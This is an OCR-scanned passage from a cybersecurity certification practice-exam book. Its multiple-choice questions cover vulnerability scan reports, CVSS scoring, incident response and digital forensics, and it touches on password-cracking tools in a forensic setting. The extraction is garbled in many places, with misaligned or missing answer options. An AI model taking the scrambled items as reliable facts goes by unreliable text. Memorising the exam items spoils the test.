Leaking this kind of information may help an attacker fine-tune attacks against the application and its 

Published: 2010/02/19 
backend. 

Modified: 2013/09/26 
Solution 


Risk Information 


Filter out error messages. 


Risk Factor: Medium 
CVSS Base Score: 5.0 


See Also 

CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P 
http://projects.webappsec.org/Fingerprinting A:N/A:N 
Output 


The web application appears to be based on MS SQL Server 


This information was leaked by these URLs : 


http://www. -com/ 
Port v Hosts 
80 / tcp / www www. .com 


192. Based upon the information presented in the vulnerability report, what type of access must 
an attacker have to exploit this vulnerability? 


A. 
B. 
C. 
D. 


The attacker must have physical access to the system. 
The attacker must have logical access to the system. 
The attacker must have access to the local network that the system is connected to. 


The attacker can exploit this vulnerability remotely. 


193. Based upon the information presented in the vulnerability report, how difficult would it be 
for an attacker to exploit this vulnerability? 


A. 


B. 
C. 
D. 


Exploiting this vulnerability requires specialized conditions that would be difficult to 


find. 
Exploiting this vulnerability requires somewhat specialized conditions. 
Exploiting this vulnerability does not require any specialized conditions. 


Exploiting this vulnerability is not possible without an administrator account. 


194. Based upon the information presented in the vulnerability report, what authentication 
hurdles would an attacker need to clear to exploit this vulnerability? 


A. 


B. 
C. 
D 


Attackers would need to authenticate two or more times. 
Attackers would need to authenticate once. 
Attackers would not need to authenticate. 


Attackers cannot exploit this vulnerability regardless of the number of authentications. 
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195. What level of confidentiality risk does this vulnerability pose to the organization? 
A. There is no confidentiality impact. 


B. Access to some information is possible, but the attacker does not have control over 
what information is compromised. 


C. Access to most information is possible, but the attacker does not have control over 
what information is compromised. 


D. All information on the system may be compromised. 


196. What level of integrity risk does this vulnerability pose to the organization? 
A. There is no integrity impact. 


B. Modification of some information is possible, but the attacker does not have control 
over what information is modified. 


C. Modification of most information is possible, but the attacker does not have control 
over what information is modified. 


D. All information on the system may be modified. 


197. What level of availability risk does this vulnerability pose to the organization? 
A. There is no availability impact. 
B. The performance of the system is degraded. 
C. One or more services on the system may be stopped. 
D. The system is completely shut down. 
198. Dan is the vulnerability manager for his organization and is responsible for tracking 
vulnerability remediation. There is a critical vulnerability in a network device that Dan 


has handed off to the device’s administrator, but it has not been resolved after repeated 
reminders to the engineer. What should Dan do next? 


A. Threaten the engineer with disciplinary action. 
B. Correct the vulnerability himself. 
C. Mark the vulnerability as an exception. 
D. Escalate the issue to the network administrator’s manager. 
199. Sara’s organization has a well-managed test environment. What is the most likely issue 


that Sara will face when attempting to evaluate the impact of a vulnerability remediation 
by first deploying it in the test environment? 


A. Test systems are not available for all production systems. 

B. Production systems require a different type of patch than test systems. 

C. Significant configuration differences exist between test and production systems. 
D 


Test systems are running different operating systems than production systems. 
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200. How many vulnerabilities listed in the report shown here are significant enough to war- 
rant immediate remediation in a typical operating environment? 


w Vulnerabilities (22) H E 





> EEE 3 NetBIOS Shared Folder List Available CVSS: - CVSS3:- Active ($~) 
> Baa 3 NFS Exported Filesystems List Vulnerability CVSS: - CVSS3: - Active {+} 
> Baa 3 SSL Server Has SSLv3 Enabled Vulnerability port 443/tcp over SSL CVSS: - CVSS3:- Active 7) 
> EEE 3 SSL Server Has SSLv2 Enabled Vulnerability port 443/tcp over SSL CVSS: - CVSS3: - Active [d~] 
> EEE 3 SSL/TLS use of weak RC4 cipher port 443/tcp over SSL CVSS: - CVSS3:- Active ($~) 
> Ba 2 Default Windows Administrator Account Name Present CVSS: - CVSS3:- Active 
> Ba 2 YP/NIS RPC Services Listening on Non-Privileged Ports CVSS: - CVSS3: - Active 
> Ba 2 NetBIOS Name Accessible CVSS: - CVSS3: - Active 
> Ba 2 Hidden RPC Services CVSS: - CVSS3:- Active 
> Ba 2 SSL Certificate - Improper Usage Vulnerability port 443/tcp over SSL CVSS: - CVSS3:- Active 
> Ba 2 SSL Certificate - Self-Signed Certificate port 443/tcp over SSL CVSS: - CVSS3:- Active 
> EE 2 SSL Certificate - Subject Common Name Does Not Match Server FQDN port 443/tcp over SSL CVSS: - CVSS3: - Active 
> Ba 2 SSL Certificate - Signature Verification Failed Vulnerability port 443/tcp over SSL CVSS: - CVSS3:- Active 
> Ba 2 NTP Information Disclosure Vulnerability port 123/udp CVSS: - CVSS3:- Active 
> 1 mountd RPC Daemon Discloses Exported Directories Accessed by Remote Hosts CVSS: - CVSS3: - Active 
>E 1 “rquotad” RPC Service Present CVSS: - CVSS3: - Active 
>E 1 Non-Zero Padding Bytes Observed in Ethernet Packets CVSS: - CVSS3: - Active 
> 1 Presence of a Load-Balancing Device Detected port 443/tcp over SSL CVSS: - CVSS3: - Active 
> 1 Presence of a Load-Balancing Device Detected port 80/tcp CVSS: - CVSS3:- Re-Opened 

A. 22 

B. 14 

C. 

D. 


201. Laura discovered an operating system vulnerability on a system on her network. After trac- 
ing the IP address, she discovered that the vulnerability is on a search appliance installed on 
her network. She consulted with the responsible engineer who informed her that he has no 
access to the underlying operating system. What is the best course of action for Laura? 


A. Contact the vendor to obtain a patch. 

B. Try to gain access to the underlying operating system and install the patch. 

C. Mark the vulnerability as a false positive. 

D. Wait 30 days and rerun the scan to see whether the vendor corrected the vulnerability. 
202. Which one of the following types of data is subject to regulations in the United States that 

specify the minimum frequency of vulnerability scanning? 

A. Driver’s license numbers 

B. Insurance records 
C. Credit card data 
D 


Medical records 


203. 


204. 


205. 


206. 


207. 
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Jim is responsible for managing his organization’s vulnerability scanning program. He is 
experiencing issues with scans aborting because the previous day’s scans are still running 
when the scanner attempts to start the current day’s scans. Which one of the following 
solutions is least likely to resolve Jim’s issue? 


A. Add anew scanner. 

B. Reduce the scope of the scans. 

C. Reduce the sensitivity of the scans. 

D. Reduce the frequency of the scans. 

Trevor is working with an application team on the remediation of a critical SQL injection 
vulnerability in a public-facing service. The team is concerned that deploying the fix will 


require several hours of downtime and that will block customer transactions from com- 
pleting. What is the most reasonable course of action for Trevor to suggest? 


A. Wait until the next scheduled maintenance window. 

B. Demand that the vulnerability be remediated immediately. 

C. Schedule an emergency maintenance for an off-peak time later in the day. 

D. Convene a working group to assess the situation. 

While conducting a vulnerability scan of his organization’s data center, Renee discovers 
that the management interface for the organization’s virtualization platform is exposed to 


the scanner. In typical operating circumstances, what is the proper exposure for this 
interface? 


A. Internet 

B. Internal networks 

C. No exposure 

D. Management network 

Richard is designing a remediation procedure for vulnerabilities discovered in his orga- 
nization. He would like to make sure that any vendor patches are adequately tested prior 


to deploying them in production. What type of environment could Richard include in his 
procedure that would best address this issue? 


A. Sandbox 
B. Honeypot 
C. Honeynet 


D. Production 

Becky is scheduling vulnerability scans for her organization’s data center. Which one of 
the following is a best practice that Becky should follow when scheduling scans? 

A. Schedule scans so that they are spread evenly throughout the day. 

B. Schedule scans so that they run during periods of low activity. 

C. Schedule scans so that they all begin at the same time. 
D 


Schedule scans so that they run during periods of peak activity to simulate perfor- 
mance under load. 
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208. Given the CVSS information shown here, where would an attacker need to be positioned 
on the network to exploit this vulnerability? 


m 


Risk Information 


Risk Factor: High 
CVSS Base Score: 7.5 


CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P 
/\:P/A:P 


The attacker must have a local administrator account on the vulnerable system. 


The attacker must have a local account on the vulnerable system but does not neces- 
sarily require administrative access. 


The attacker must have access to the local network. 


The attacker may exploit this vulnerability remotely without an account on the 
system. 





Domain 3: Cyber 
Incident Response 





EXAM OBJECTIVES COVERED IN THIS 
CHAPTER: 


Y 3.1 Given a scenario, distinguish threat data or behavior 
to determine the impact of an incident. 


=» Threat classification 


=» Factors contributing to incident severity and prioritization 


Y/Y 3.2 Given a scenario, prepare a toolkit and use 
appropriate forensics tools during an investigation. 


a Forensics kit 


=» Forensic investigation suite 


Y/Y 3.3 Explain the importance of communication during the 
incident response process. 


a Stakeholders 
=» Purpose of communication processes 


=» Role-based responsibilities 


/ 3.4 Given a scenario, analyze common symptoms to select 
the best course of action to support incident response. 


=» Common network-related symptoms 
a Common host-related symptoms 


= Common application-related symptoms 


Y 3.5 Summarize the incident recovery and post-incident 
response process. 


a Containment techniques 
=» Eradication techniques 
= Validation 

a Corrective actions 


a Incident summary report 
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. If Lucca wants to validate the application files he has downloaded from the vendor of his 


application, what information should he request from them? 

A. File size and file creation date 

B. MDS hash 

C. Private key and cryptographic hash 

D. Public key and cryptographic hash 

Jeff discovers multiple .jpg photos during his forensic investigation of a computer 


involved in an incident. When he runs exiftool to gather file metadata, which informa- 
tion is not likely to be part of the images even if they have complete metadata intact? 


A. GPS location 
B. Camera type 
C. Number of copies made 


D. Correct date/timestamp 


. Chris wants to run John the Ripper against a Linux system’s passwords. What does he 


need to attempt password recovery on the system? 
A. Both /etc/passwd and /etc/shadow 

B. /etc/shadow 

C. /etc/passwd 


D. Chris cannot recover passwords; only hashes are stored. 


. Charles needs to review the permissions set on a directory structure on a Window system 


he is investigating. Which Sysinternals tool will provide him with this functionality? 
A. DiskView 

B. AccessEnum 

C. du 

D. AccessChk 


. John has designed his network as shown here and places untrusted systems that want to 


connect to the network into the Guests network segment. What is this type of segmenta- 
tion called? 
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A. Proactive network segmentation 
B. Isolation 
C. Quarantine 


D. Removal 


6. The organization that Alex works for classifies security related events using NIST’s stan- 
dard definitions. Which classification should he use when he discovers key logging soft- 
ware on one of his frequent business traveler’s laptop? 


A. Anevent 
B. An adverse event 
C. A security incident 
D. A policy violation 
7. Jennifer is planning to deploy rogue access point detection capabilities for her network. If 


she wants to deploy the most effective detection capability she can, which of the following 
detection types should she deploy first? 


A. Authorized MAC 
B. Authorized SSID 
C. Authorized channel 
D 


Authorized vendor 
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10. 


11. 


12. 
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Dan is designing a segmented network that places systems with different levels of secu- 
rity requirements into different subnets with firewalls and other network security devices 
between them. What phase of the incident response process is Dan in? 


A. Post-incident activity 

B. Detection and analysis 

C. Preparation 

D. Containment, eradication, and recovery 

The company that Brian works for processes credit cards and is required to be compliant 


with PCI-DSS. If Brian’s company experiences a breach of card data, what type of disclo- 
sure will they be required to provide? 


A. Notification to local law enforcement 

B. Notification to their acquiring bank 

C. Notification to federal law enforcement 

D. Notification to Visa and MasterCard 

Lauren wants to create a backup of Linux permissions before making changes to the Linux 


workstation she is attempting to remediate. What Linux tool can she use to back up the 
permissions of an entire directory on the system? 


A. chbkup 
B. getfacl 
C. aclman 


D. There is not a common Linux permission backup tool. 

While working to restore systems to their original configuration after a long-term APT 
compromise, Charles has three options. 

A. He can restore from a backup and then update patches on the system. 


B. Hecan rebuild and patch the system using original installation media and application 
software using his organization’s build documentation. 


C. He can remove the compromised accounts and rootkit tools and then fix the issues 
that allowed the attackers to access the systems. 


Which option should Charles choose in this scenario? 

A. Option A 

B. Option B 

C. Option C 

D. None of the above. Charles should hire a third party to assess the systems before 
proceeding. 

Jessica wants to access a macOS FileVault 2-encrypted drive. Which of the following 

methods is not a possible means of unlocking the volume? 

A. Change the FileVault key using a trusted user account. 

B. Retrieve the key from memory while the volume is mounted. 

C. Acquire the recovery key. 

D. Extract the keys from iCloud. 
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13. Susan discovers the following log entries that occurred within seconds of each other in her 
Squert (a Sguil web interface) console. What have her network sensors most likely detected? 


1 


> 


1 1 22:41:09 ET POLICY Suspicious inbound to Oracle SQL port 1521 2010936 6 5.000% 
1 1 22:41:08 ET SCAN Potential VNC Scan 5800-5820 2002910 6 2.500% 
1 1 22:41:08 ET POLICY Suspicious inbound to PostgreSQL port 5432 2010939 6 5.000% 
1 1 22:41:07 ET SCAN Potential VNC Scan 5900-5920 2002911 6 2.500% 
1 1 22:41:07 ET POLICY Suspicious inbound to MSSQL port 1433 2010935 6 5.000% 


1 1 22:41:06 ET POLICY Suspicious inbound to mySQL port 3306 2010937 6 5.000% 


A failed database connection from a server 
A denial-of-service attack 
A port scan 


A misconfigured log source 


Frank wants to log the creation of user accounts on a Windows 7 workstation. What tool 


should he use to enable this logging? 


A. 
B. 
C. 
D. 


secpol.msc 
auditpol.msc 
regedit 


Frank does not need to make a change; this is a default setting. 


15. If Danielle wants to purge a drive, which of the following options will accomplish her goal? 


A. 
B. 
C. 
D. 


Cryptographic erase 
Reformat 
Overwrite 


Repartition 


16. Cynthia wants to build scripts to detect malware beaconing behavior. Which of the 
following is not a typical means of identifying malware beaconing behavior on a network? 


A. 
B. 
C. 
D. 


Persistence of the beaconing 
Beacon protocol 
Beaconing interval 


Removal of known traffic 


17. While performing post-rebuild validation efforts, Scott scans a server from a remote 
network and sees no vulnerabilities. Joanna, the administrator of the machine, runs a scan 
and discovers two critical vulnerabilities and five moderate issues. What is most likely 
causing the difference in their reports? 


A. 


B. 
C. 
D 


Different patch levels during the scans 
They are scanning through a load balancer. 
There is a firewall between the remote network and the server. 


Scott or Joanna ran the vulnerability scan with different settings. 
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18. As part of his organization’s cooperation in a large criminal case, Adam’s forensic team 
has been asked to send a forensic image of a highly sensitive compromised system in RAW 
format to an external forensic examiner. What steps should Adam’s team take prior to 
sending a drive containing the forensic image? 


A. Encode in EO1 format and provide a hash of the original file on the drive. 
B. Encode in FTK format and provide a hash of the new file on the drive. 
C. Encrypt the RAW file and transfer a hash and key under separate cover. 
D. Decrypt the RAW file and transfer a hash under separate cover. 
19. Mika wants to analyze the contents of a drive without causing any changes to the drive. 
What method is best suited to ensuring this? 
A. Set the “read-only” jumper on the drive. 
B. Usea write blocker. 
C. Usea read blocker. 
D 


Use a forensic software package. 


Case Number: Item Number: 
Evidence Description: 


Collection method: 


Evidence storage method: 
How is evidence secured? 
Collected by: (Name/ID#) 
Signature of collector ——— Á č = žă o o 
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20. What type of forensic investigation-related form is shown here? 


A. 
B. 
C. 
D. 


Chain of custody 
Report of examination 
Forensic discovery log 


Policy custody release 


21. Lisa is following the CompTIA process for validation after a compromise. Which of the 
following actions should be included in this phase? 


A. 
B. 
C. 
D. 


Sanitization 
Re-imaging 
Setting permissions 


Secure disposal 


22. Eric has access to a full suite of network monitoring tools and wants to use appropriate 
tools to monitor network bandwidth consumption. Which of the following is not a 
common method of monitoring network bandwidth usage? 


A. 
B. 
C. 
D. 


SNMP 
Portmon 
Packet sniffing 
Netflow 


23. James wants to determine whether other Windows systems on his network are infected 
with the same malware package that he has discovered on the workstation he is analyzing. 
He has removed the system from his network by unplugging its network cable, as required 
by corporate policy. He knows that the system has previously exhibited beaconing 
behavior and wants to use that behavior to identify other infected systems. How can he 
safely create a fingerprint for this beaconing without modifying the infected system? 


A. 


B. 


Plug the system in to the network and capture the traffic quickly at the firewall using 
Wireshark. 


Plug the system into an isolated switch and use a span port or tap and Wireshark to 
capture traffic. 


Review the ARP cache for outbound traffic. 


Review the Windows firewall log for traffic logs. 
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24. Fred is attempting to determine whether a user account is accessing other systems on 
his network and uses Lsof to determine what files the user account has open. What 
information should he identify when faced with the following Lsof output? 


adminuser@demobox:~$ sudo lsof -u demo 
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 
bash 3882 demo cwd DIR oe 4096 1708171 /home/osboxes 


ssh 3885 demo cwd DIR 8,1 4096 1708171 /home/osboxes 

ssh 3885 demo rtd DIR 8,1 4096 2- 

ssh 3885 demo txt REG 8,1 707248 799062 /usr/bin/ssh 

ssh 3885 demo 3u IPv4 32292 ete TCP 10.0.2.6:40114->remote.host.com:ssh (ESTABLISHED) 
ssh 3885 demo 4u CHR 136,17 oto 20 /dev/pts/17 

ssh 3885 demo Su CHR 136,17 ete 20 /dev/pts/17 

ssh 3885 demo 6u CHR 136,17 Oto 20 /dev/pts/17 

bash 3957 demo cwd DIR 8,1 4096 1708171 /home/osboxes 

bash 3957 demo rtd DIR 8,1 4096 2/ 

bash 3957 demo txt REG 8,1 1037464 655367 /bin/bash 

bash 3957 demo mem REG 8,1 47600 1315424 /1lib/x86_64-linux-gnu/libnss_files-2.23.so 
bash 3957 demo mem REG 8,1 47648 1315434 /lib/x86_64-linux-gnu/libnss_nis-2.23.so 
bash 3957 demo mem REG 8,1 93128 1315418 /1ib/x86_64-linux-gnu/libns1-2.23.so 

bash 3957 demo mem REG 8,1 35688 1315420 /lib/x86_64-linux-gnu/libnss_compat-2.23.so0 
bash 3957 demo mem REG 8,1 10219008 793850 /usr/lib/locale/locale-archive 

bash 3957 demo mem REG 8,1 1864888 1315325 /lib/x86_64-linux-gnu/libc-2.23.so 

bash 3957 demo mem REG 8,1 14608 1315349 /lib/x86_64-linux-gnu/libd1-2.23.so 

bash 3957 demo mem REG 8,1 167240 1315497 /lib/x86_64-linux-gnu/libtinfo.so.5.9 

bash 3957 demo mem REG 8,1 162632 1315297 /lib/x86_64-linux-gnu/ld-2.23.so 

bash 3957 demo mem REG 8,1 26258 1051663 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache 
bash 3957 demo Qu CHR 136,4 oto 7 /dev/pts/4 

bash 3957 demo 1u CHR 136,4 ete 7 /dev/pts/4 

bash 3957 demo 2u CHR 136,4 Oto 7 /dev/pts/4 

bash 3957 demo 255u CHR 136,4 oto 7 /dev/pts/4 


The user account demo is connected from remote .host.com to a local system. 
The user demo has replaced the /bash executable with one they control. 


The user demo has an outbound connection to remote.host.com. 


909 9 > 


The user demo has an inbound ssh connection and has replaced the bash binary. 


25. After completing an incident response process and providing a final report to 
management, what step should Casey use to identify improvement to her incident response 
plan? 


A. Update system documentation. 
B. Conduct a lessons-learned session. 
C. Review patching status and vulnerability scans. 
D. Engage third-party consultants. 
26. The senior management at the company that Kathleen works for is concerned about rogue 


devices on the network. If Kathleen wants to identify rogue devices on her wired network, 
which of the following solutions will quickly provide the most accurate information? 


A. A discovery scan using a port scanner. 


B. Router and switch-based MAC address reporting. 


27. 


28. 


29. 


30. 
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C. A physical survey. 
D. Reviewing a central administration tool like SCCM. 
While investigating a system error, Lauren runs the df command on a Linux box that she 


is the administrator for. What problem and likely cause should she identify based on this 
listing? 


# df -h /var/ 

Filesystem Size Used Avail Use% Mounted on 
/dev/sdal 40G 11.2G 28.8 28% / 
/dev/sda2 3.9G 3.9G 0 100% /var 


A. The var partition is full and needs to be wiped. 
B. Slack space has filled up and needs to be purged. 
C. The var partition is full, and logs should be checked. 


D. The system is operating normally and will fix the problem after a reboot. 


In order, which set of Linux permissions are least permissive to most permissive? 
A. 777, 444, 111 
B. 544, 444, 545 
C. 711, 717, 117 
D. 111, 734, 747 


As Lauren prepares her organization’s security practices and policies, she wants to address 
as many threat vectors as she can using an awareness program. Which of the following 
threats can be most effectively dealt with via awareness? 


A. Attrition 

B. Impersonation 

C. Improper usage 

D. Web 

Scott wants to recover user passwords for systems as part of a forensic analysis effort. If he 


wants to test for the broadest range of passwords, which of the following modes should he 
run John the Ripper in? 


A. Single crack mode 
B. Wordlist mode 

C. Incremental mode 
D 


External mode 
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31. During a forensic investigation, Charles discovers that he needs to capture a virtual 
machine that is part of the critical operations of his company’s website. If he cannot 
suspend or shut down the machine for business reasons, what imaging process should he 
follow? 


A. Performa snapshot of the system, boot it, suspend the copied version, and copy the 
directory it resides in. 


B. Copy the virtual disk files and then use a memory capture tool. 


C. Escalate to management to get permission to suspend the system to allow a true 
forensic copy. 


D. Use a tool like the Volatility Framework to capture the live machine completely. 

32. Mika, a computer forensic examiner, receives a PC and its peripherals that were seized as 
forensic evidence during an investigation. After she signs off on the chain of custody log 
and starts to prepare for her investigation, one of the first things she notes is that each 


cable and port was labeled with a color-coded sticker by the on-site team. Why are the 
items labeled like this? 


A. To ensure chain of custody 
B. To ensure correct re-assembly 
C. To allow for easier documentation of acquisition 
D. To tamper-proof the system 
33. Laura needs to create a secure messaging capability for her incident response team. Which 
of the following methods will provide her with a secure messaging tool? 
A. Text messaging 
B. A Jabber server with TLS enabled 
C. Email with TLS enabled 
D. A messaging application that uses the Signal protocol 


34. While reviewing her Nagios logs, Selah discovers the error message shown here. What 
should she do about this error? 





Apache 404 Errors sare Critical 1d6h2m 11s 1/1 


Check for evidence of a port scan. 
Review the Apache error log. 


Reboot the server to restore the service. 
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Restart the Apache service. 


35. 


36. 


37. 


38. 


39. 
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Alex needs to sanitize hard drives that will be leaving his organization after a lease is 
over. The drives contained information that his organization classifies as sensitive data 
that competitors would find valuable if they could obtain it. Which choice is the most 
appropriate to ensure that data exposure does not occur during this process? 


A. Clear, validate, and document. 

B. Purge the drives. 

C. Purge, validate, and document. 

D. The drives must be destroyed to ensure no data loss. 


Selah is preparing to collect a forensic image for a Macintosh computer. What hard drive 
format is she most likely to encounter? 


A. FAT32 
B. MacFAT 
C. HFS+ 

D. NTFS 


During a forensic analysis of an employee’s computer as part of a human resources 
investigation into misuse of company resources, Tim discovers a program called Eraser 
installed on the PC. What should Tim expect to find as part of his investigation? 


A. A wiped C: drive 

B. Antiforensic activities 

C. All slack space cleared 

D. Temporary files and Internet history wiped 

Jessica wants to recover deleted files from slack space and needs to identify where the files 
begin and end. What is this process called? 

A. Slacking 

B. Data carving 

C. Disk recovery 

D. Header manipulation 

Lauren is the IT manager for a small company and occasionally serves as the 


organization’s information security officer. Which of the following roles should she include 
as the leader of her organization’s CSIRT? 


A. Her lead IT support staff technician 
B. Her organization’s legal counsel 

C. A third-party IR team lead 

D. She should select herself. 
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40. During her forensic analysis of a Windows system, Cynthia accesses the registry and 

checks \\HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ 
Winlogin. What domain was the system connected to, and what was the username that 
would appear at login? 


41. 


Name 


(Default) 


|AutoAdminLogon 


AutoRestartShell 


ab) Background 


(so / 
os, 


(so (so 


(20 
doz, 


(so 
os, 


(se 
doz, 


| CachedLogonsCount 


DebugServerCommand 
DefaultDomainName 


|DefaultUserName 
o| DisableBackButton 


DisableCad 
EnableFirstLlogonAnimation 
EnableS!Hostintegration 
ForceUnlockLogon 
LastLogOffEndTimePerfCounter 
LegalNoticeCaption 


a>) LegalNoticeText 


PasswordExpiryWarning 


ab! PowerdownAfterShutdown 
ab| PreCreateKnownFolders 
ab) ReportBootOk 

ab) scremoveoption 


ab 


‘so / 
dos, 


(se (so 
Joz, 203, 


| Shell 


ShellCritical 
Shellinfrastructure 


ShutdownFlags 


ShutdownWithoutLogon 
SiHostCritical 
SiHostReadyTimeOut 
SiHostRestartCountLimit 
SiHostRestartTimeGap 


a>) Userinit 
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VMApplet 


ab) WinStationsDisabled 


Admin, administrator 
No domain, admin 


Legal, admin 


Type 

REG_SZ 
REG_SZ 
REG_DWORD 
REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_QWORD 
REG_SZ 
REG_SZ 
REG_DWORD 
REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_SZ 
REG_SZ 
REG_SZ 


Corporate, no default username 


Data 


(value not set) 
0 

0x00000001 (1) 
000 

10 

no 


admin 

0x00000001 (1) 

0x00000001 (1) 

0x00000001 (1) 

0x00000001 (1) 

0x00000000 (0) 

Oxde16d1a837 (953865578551) 


0x00000005 (5) 

0 
{A520A1A4-1780-4FF6-BD18-167343CSAF 16} 
1 

0 

explorer.exe 

0x00000000 (0) 

sihost.exe 

0x00000087 (135) 

0 

0x00000000 (0) 

0x00000000 (0) 

0x00000000 (0) 

0x00000000 (0) 
C:\Windows\system32\userinit.exe, 
SystemPropertiesPerformance.exe /pagefile 
0 


Lauren wants to ensure that the two most commonly used methods for preventing Linux 
buffer overflow attacks are enabled for the operating system she is installing on her 
servers. What two related technologies should she investigate to help protect her systems? 


A. The 


B. StackAntismash and DEP 
C. Position-independent variables and ASLR 
D. DEP and the position-independent variables 


NX bit and ASLR 


42. 


43. 


44. 


45. 


46. 
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Angela is attempting to determine when a user account was created on a Windows 10 
workstation. What method is her best option if she believes the account was created 
recently? 


A. Check the System log. 

B. Check the user profile creation date. 

C. Check the Security log. 

D. Query the registry for the user ID creation date. 

Alex suspects that an attacker has modified a Linux executable using static libraries. 


Which of the following Linux commands is best suited to determining whether this has 
occurred? 


A. file 
B. stat 
C. strings 
D. grep 


Lauren wants to detect administrative account abuse on a Windows server that she is 
responsible for. What type of auditing permissions should she enable to determine whether 
users with administrative rights are making changes? 


A. Success 


B. Fail 
C. Full control 
D. All 


Cameron believes that the Ubuntu Linux system that he is restoring to service has already 
been fully updated. What command can he use to check for new updates, and where can 
he check for the history of updates on his system? 


A. apt-get -u upgrade, /var/log/apt 

B. rpm -i upgrade, /var/log/rpm 

C. upgrade -l, /var/log/upgrades 

D. apt-get install -u; Ubuntu Linux does not provide a history of updates 
Adam wants to quickly crack passwords from a Windows 7 system. Which of the 
following tools will provide the fastest results in most circumstances? 

A. John the Ripper 

B. Cain and Abel 

C. Ophcrack 

D. Hashcat 


152 Chapter 3 = Domain 3: Cyber Incident Response 


47. Because of external factors, Eric has only a limited time period to collect an image from 
a workstation. If he collects only specific files of interest, what type of acquisition has he 


performed? 

A. Logical 
B. Bit-by-bit 
C. Sparse 


D. None of the above 


48. Kelly sees high CPU utilization in the Windows Task Manager, as shown here, while 
reviewing a system’s performance issues. If she wants to get a detailed view of the CPU 
usage by application, with PIDs and average CPU usage, what native Windows tool can 
she use to gather that detail? 


CPU Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz 
% Utilization 100% 
60 seconds 0 
Utilization Speed Maximum speed: 3.50 GHz 
14% 3.57 GHz Sockets: 1 
Cores: 4 
Processes Threads Handles Logical processors: 8 
240 3037 113829 Virtualization: Enabled 
L1 cache: 256 KB 
Up time L2 cache: 1.0 MB 
6:00:33:18 L3 cache: 8.0 MB 
A. Resource Monitor 
B. Task Manager 
C. iperf 
D. Perfmon 


49. During a forensic investigation, Steve records information about each drive, including 
where it was acquired, who made the forensic copy, the MDS hash of the drive, and other 
details. What term describes the process Steve is using as he labels evidence with details of 
who acquired and validated it? 


A. Direct evidence 

B. Circumstantial evidence 
C. Incident logging 

D. Chain of custody 
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50. Roger’s SolarWinds monitoring system provides Windows memory utilization reporting. 
Use the chart shown here to determine what actions Roger should take based on his 
monitoring. 


Memory Capacity Forecast Chart 


dev-aus-lali-02 
Jan 22 2017, 4:33 am - Apr 22 2017, 12:00 pm 


Zoom th 12h 24h 


23 Jan 30 Jan 6 Feb 13 Feb 27 Feb 6 Mar 13 Mar 20 Mar 3 Apr 10 Apr 17 Apr 


Apr “17 





RESOURCE WARNING CRITICAL AT CAPACITY 


>80% >90% >100% 
GB Peak Trend sonar 
“i yea 
>80% 


E Average Trend 
>1 year 





A. The memory usage is stable and can be left as it is. 
B. The memory usage is high and must be addressed. 
C. Roger should enable automatic memory management. 
D. There is not enough information to make a decision. 
51. NIST defines five major types of threat information types in NIST SP 800-150, “Guide to 
Cyber Threat Information Sharing.” 


1. Indicators, which are technical artifacts or observables that suggest an attack is 
imminent, currently underway, or compromise may have already occurred 


2. Tactics, techniques, and procedures that describe the behavior of an actor 
3. Security alerts like advisories and bulletins 


4. Threat intelligence reports that describe actors, systems, and information being 
targeted and the methods being used 


5. Tool configurations that support collection, exchange, analysis, and use of threat 


information 


Which of these should Frank seek out to help him best protect the midsize organization he 
works for against unknown threats? 


A. 1,2,and5 
B. 1,3,and5 
C. 2,4,and5 


D. 1,2,and 4 
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53. 


54. 


55. 


56. 
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Alex wants to determine whether the user of a company-owned laptop accessed a 
malicious wireless access point. Where can he find the list of wireless networks that the 
system knows about? 


A. The registry 

B. The user profile directory 

C. The wireless adapter cache 

D. Wireless network lists are not stored after use. 

Fred wants to prevent buffer overflows from succeeding against his organization’s web 
applications. What technique is best suited to preventing this type of attack from succeeding? 
A. User input canonicalization 

B. User input size checking 

C. Format string validation 

D. Buffer overwriting 

Susan needs to perform forensics on a virtual machine. What process should she use to 
ensure she gets all of the forensic data she may need? 

A. Suspend the machine and copy the contents of the directory it resides in. 

B. Perform a live image of the machine. 

C. Suspend the machine and make a forensic copy of the drive it resides on. 

D. Turn the virtual machine off and make a forensic copy of it. 

Allison wants to access Chrome logs as part of a forensic investigation. What format is 
information about cookies, history, and saved form fill information saved in? 

A. SQLite 

B. Plain text 

C. Base64 encoded text 

D. NoSQL 


While Chris is attempting to image a device, he encounters write issues and cannot write 
the image as currently set. What issue is he most likely encountering? 


Image Destination Folder 
[EA Browse | 
Image Filename (Excluding Extension) 


[CSAplus_image01 


Image Fragment Size (MB) fso o 
For Raw, E01, and AFF formats: 0 = do not fragment 


Compression (0=None, 1=Fastest. .... 9=Smallest) fo = 


Use AD Encryption [~ 





57. 


58. 


59. 
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Christina is configuring her SolarWinds alerts for rogue devices and wants to select an 
appropriate reset condition for rogue MAC address alerts. Which of the options shown 
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The files need to be compressed. 
The destination drive is formatted FAT32. 
The destination drive is formatted NTFS. 


The files are encrypted. 
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here is best suited to handling rogue devices if she wants to avoid creating additional work 
for her team? 
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Fred needs to validate the MDS checksum of a file on a Windows system but is not 


3. Reset Condition 


When the reset condition is met the alert is removed from active alerts. »Learn more 


Reset this alert when trigger condition is no longer true 


Reset this alert automatically after minutes Y 
No reset condition - Trigger this alert each time the trigger condition is met 
No reset action - Manually remove the alert from the active alerts list 


Create a special reset condition for this alert 


Reset when no longer true. 
Reset after a time period. 
No reset condition; trigger each time condition is met. 


No reset action; manually remove the alert from the active alerts list. 


allowed to install any programs and cannot run files from external media or drives. What 
Windows utility can he use to get the MDS hash of the file? 


A. md5sum 

B. certutil 

C. shalsum 

D. hashcheck 

Which of the following is not an important part of the incident response communication 
process? 

A. Limiting communication to trusted parties 


B. 
C. 
D 


Disclosure based on public feedback 
Using a secure method of communication 


Preventing accidental release of incident-related information 
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60. Alex is diagnosing major network issues at a large organization and sees the following 
graph in her PRTG console on the “outside” interface of her border router. What can Alex 
presume has occurred? 


Live Graph - 60 Minutes - 15 sec Interval 


megabit/second 
«8208 





The network link has failed. 
A DDoS is in progress. 


